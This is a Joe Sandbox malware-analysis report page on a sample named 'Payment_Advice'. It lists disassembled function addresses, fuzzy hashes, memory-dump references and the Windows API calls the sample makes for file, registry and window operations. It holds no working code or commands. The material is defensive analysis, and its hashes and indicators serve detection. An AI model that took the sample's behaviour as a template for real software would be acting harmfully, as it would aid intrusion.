Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-2030658151
Opcode ID: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
Instruction ID: 83aabcaf15b65d6ee402870331ad2dcb86c8daa90b7dc9f7dbfd98a18550c494
Opcode Fuzzy Hash: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
Instruction Fuzzy Hash: 92D0A921006830B1C54232263C02FCF192C8F0A32AF12A037F808B40D2CB3C2A8284FE

Function 00406972 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
Instruction ID: 94fbdcceb26da600dda965ba42e87acb8ed5f49c48e72c46c8f329f18f478b7c
Opcode Fuzzy Hash: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
Instruction Fuzzy Hash: 31A13271E00229CBDF28CFA8C8446ADBBB1FF48305F15856AD856BB281C7785A96DF44

Function 00406B73 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
Instruction ID: 161b61abd2ed0806a8baee45b40892b28aad2ec91d5fdb0f87a4ef8c893441ab
Opcode Fuzzy Hash: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
Instruction Fuzzy Hash: 33911370E04228CBEF28CF98C8547ADBBB1FF44305F15816AD456BB291C7785A96DF48

Function 00406889 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
Instruction ID: 72176883cd04ce23c5606ed187e212a481aff986895f719837de05734152d470
Opcode Fuzzy Hash: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
Instruction Fuzzy Hash: C2813471E00228CBDF24CFA8C844BADBBB1FF44305F25816AD416BB281C7789A96DF45

Function 004067DC Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
Instruction ID: 06582d6994b983150c25b1790107e31aec949b245444a1a6456fb9016973e262
Opcode Fuzzy Hash: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
Instruction Fuzzy Hash: 33711371E00228DBDF24CFA8C844BADBBB1FF48305F15816AD416BB291C7789A96DF54

Function 004068FA Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
Instruction ID: ebc9a81060a596ad431c80b1d1758c5c700cdc7d234e992f1b297214c353d564
Opcode Fuzzy Hash: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
Instruction Fuzzy Hash: 19713371E00228CBDF28CF98C844BADBBB1FF44301F15816AD416BB281C7789A96DF48

Function 00406846 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
Instruction ID: 9ba1edbe5cfe128ed99381d9e4cb31fcf1809be200f9a36a9650a2a134254892
Opcode Fuzzy Hash: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
Instruction Fuzzy Hash: D8713571E00228DBDF28CF98C844BADBBB1FF44305F15816AD456BB291C7789A96DF44

Function 00405BD7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,0040BE78,0040330A,00409230,00409230,004031FC,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?), ref: 00405BEB

Strings

habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 00405BDA

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: FileRead
String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
API String ID: 2738559852-2559241417
Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
Instruction ID: bc424be8b840dd139efea3d7e203f87911aff5df88b68b997cf3f66dc638529d
Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
Instruction Fuzzy Hash: 25E0EC3261425AABDF50AEA59C04EEB7B6CFB05360F044432F915E7190D631F921ABA9

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
Instruction ID: f7aa54b913f5ca68b4de92db4f2492a915771a0f44b2d9fd206d2c7cbab0d3a4
Opcode Fuzzy Hash: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
Instruction Fuzzy Hash: B501F431724210ABE7295B789C05B6A3698E720314F10853FF911F72F1DA78DC138B4D

Function 004022D3 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402C42: RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6A

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F2
RegCloseKey.ADVAPI32(00000000), ref: 004022FB

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: 36ef5da6fbfc07e8a15b968ecea78d0f55385d49df1121e4a03b4c1c669af082
Instruction ID: 6cfe575b1e931931ae6cf9a5ddb5ae5b21c85a020fc8f89310b59cc06b76a7bd
Opcode Fuzzy Hash: 36ef5da6fbfc07e8a15b968ecea78d0f55385d49df1121e4a03b4c1c669af082
Instruction Fuzzy Hash: E4F0AF72A04210ABEB01AFA18A8EAAE73689B14314F60043BF501B71C0C9BC5D02862A

Function 00405265 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405275

Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B

OleUninitialize.OLE32(00000404,00000000), ref: 004052C1

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: af2aeeadcd52dffc57fc188a5948419f293eac36f005212a773a20406220c2cd
Instruction ID: 554e103746b9e2db7aaf45f87dc76b5a043826cfff103a1ab0517efa01412f9c
Opcode Fuzzy Hash: af2aeeadcd52dffc57fc188a5948419f293eac36f005212a773a20406220c2cd
Instruction Fuzzy Hash: 8FF090B6645600EBF62157549D05B677364EFE0300F1948BEEE44B22A1D7794C428F6D

Function 00401DC7 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
EnableWindow.USER32(00000000,00000000), ref: 00401DE8

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 5d4edafec38fd2beb48ef5d0e9a47d4925bced023b06079ab6e9292498eaacb4
Instruction ID: 0a70c1ef7b0b049098d210b4544fd1cb3982b30fa54b0c42b808752cdcd1ba25
Opcode Fuzzy Hash: 5d4edafec38fd2beb48ef5d0e9a47d4925bced023b06079ab6e9292498eaacb4
Instruction Fuzzy Hash: 15E08CB2B04100DBD710AFA5AA8899D3378AB90369B60087BF502F10D1C6B86C008A7E

Function 00405B54 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16

Function 00405B2F Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405734,?,?,00000000,0040590A,?,?,?,?), ref: 00405B34
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405B48

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
Instruction ID: d8ea778f90f6dc502634cdc114c7d77142f0ebe51d0822ef38570996ea54cda0
Opcode Fuzzy Hash: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
Instruction Fuzzy Hash: 0AD01272D09020AFC6102728EE0C89BFF69EB54371B018B31FD75A22F0C7305C52CAA6

Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6

Memory Dump Source

